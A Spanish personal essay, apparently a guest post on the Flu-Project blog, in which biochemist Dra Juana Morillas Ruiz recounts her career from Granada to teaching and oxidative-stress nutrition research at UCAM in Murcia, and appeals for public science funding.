Ya siendo estudiante en la Facultad de Farmacia de la Universidad de Granada tuve clara mi pasión por la investigación y por la docencia en el mundo universitario. Esta pasión empezó a materializarse cuando entré de alumna interna en el departamento de Bioquímica y Biología Molecular en la Universidad de Granada. Tuve la suerte de tener grandes maestros tanto en la docencia como en la investigación, que fueron los que realmente despertaron mi pasión. En aquel ya lejano departamento realicé lo que entonces se llamaba tesina, inicié la tesis doctoral, y al finalizar la carrera me ofrecieron un contrato de investigación que, por esas casualidades de la vida, me inició en el mundo de la investigación entre la Bioquímica y la Nutrición. De aquellos años, además de maravillosas amistades en el mundo de la Bioquímica, salieron publicaciones científicas y una experiencia investigadora muy valiosa (dada la juventud que tenía) incorporándome a diferentes proyectos. Todo ello eran buenos cimientos para dar solidez a un futuro profesional muy soñado por mí.

Pero en la mujer hay una casualidad cronológica que hace coincidir los años para el lanzamiento profesional con los años en los que la madre Naturaleza nos programa en la mejor versión para la maternidad, y esta versión dio sus frutos. Con tres embarazos y tres hijos muy seguidos no pude mantener esa dualidad de mujer trabajadora y madre, optando libre y orgullosa por ser madre a tiempo completo.

Por cuestiones profesionales de mi marido, a finales de los 90 nos habíamos trasladado a Murcia, donde una nueva universidad (la UCAM) estaba a punto de iniciar su andadura. Allí dejé un lunes de 1998 el curriculum (con un parón profesional de 6 años motivado por la crianza de los tres hijos) y el miércoles siguiente me llamaron, interesados desde la universidad por mí. Por esas casualidades que nos regala la vida, pretendían poner en marcha los estudios universitarios de Nutrición, donde encajaba perfectamente mi curriculum con experiencia investigadora en ese campo. Reconozco que no podía ser más feliz aquel día en el que empecé a trabajar en la UCAM, y que hoy mantengo la alegría, la ilusión y las ganas de hacerlo cada día mejor, como ese primero. 

Tras 23 años de dar clases en la universidad en la Facultad de Ciencias de la Salud a futuros nutricionistas, enfermeros, fisioterapeutas, médicos y farmacéuticos, en disciplinas como la Bioquímica y la Farmacología, además investigo en líneas tan maravillosas en su aplicación directa a nuestra sociedad como son el estrés oxidativo en deportistas, ancianos, enfermos de Alzheimer, con el desarrollo de alimentos funcionales ricos en antioxidantes. Evaluamos el efecto que ejercen los distintos tipos de antioxidantes disminuyendo ese estrés oxidativo, (que hoy sabemos que es la alteración bioquímica que tienen en común patologías tan dispares como el cáncer, la diabetes, el alcoholismo, la esquizofrenia, la obesidad, la enfermedad cardiovascular, etc…) e incluso situaciones fisiológicas como el embarazo o la actividad física de alta intensidad o sin el entrenamiento adecuado. Junto a esta línea de investigación, llevo otra línea que analiza el efecto de las distintas grasas que aporta la dieta sobre el estrés oxidativo asociado al riesgo cardiovascular. En todos mis proyectos siempre reservo un apartado para evaluar nutricionalmente a la población del estudio (lo que nos permite una interacción humana con estos voluntarios) y llevar a cabo una educación nutricional que mejore la calidad de vida a través de mejorar la alimentación. Esa es una de las grandes satisfacciones de este trabajo, además de las que  se derivan de los resultados en la producción científica con invitaciones como ponente a más de 100 congresos nacionales e internacionales, decenas de artículos científicos en revistas de impacto, varios libros publicados (y más aún si se trata de colaboraciones en capítulos de libros), invitaciones para divulgación científica en radios y televisiones, reconocimientos en forma de Premio Extraordinario de Doctorado y varios premios a la investigación.

Sigo entrando en las aulas (o en estos días en las clases en streaming) con la misma ilusión de mis primeros días, aunque sumando la experiencia… creo que serán mejores clases. Sigo diseñando proyectos, escribiendo artículos, revisándolos y participando en tareas de gestión de la universidad con las mismas ganas de quien empieza. Esa energía solo puede salir de dentro, cuando eres realmente feliz con lo que haces, y eso no es ningún mérito personal, es una forma de vida que compartimos muchos, muchos de los que nos dedicamos a la Ciencia.

Y para seguir dedicándonos a la Ciencia, y mejorando nuestra sociedad, es necesario que desarrollemos proyectos, proyectos que necesitan ser financiados. Agradezco esta invitación, para gritar que cada individuo viene al mundo con una obligación: aportar algo para dejar un mundo mejor. Los científicos debemos cumplir con ella investigando, y para ello necesitamos que los poderes responsables adjudiquen a la investigación los fondos necesarios. 

Gracias a ti lector@, que tal vez además de seguidor de Flu-Project, tengas capacidad de acción sobre los fondos que se adjudican para mejorar nuestro mundo a través de la investigación en Ciencia. 

Un abrazo

Dra Juana Morillas Ruiz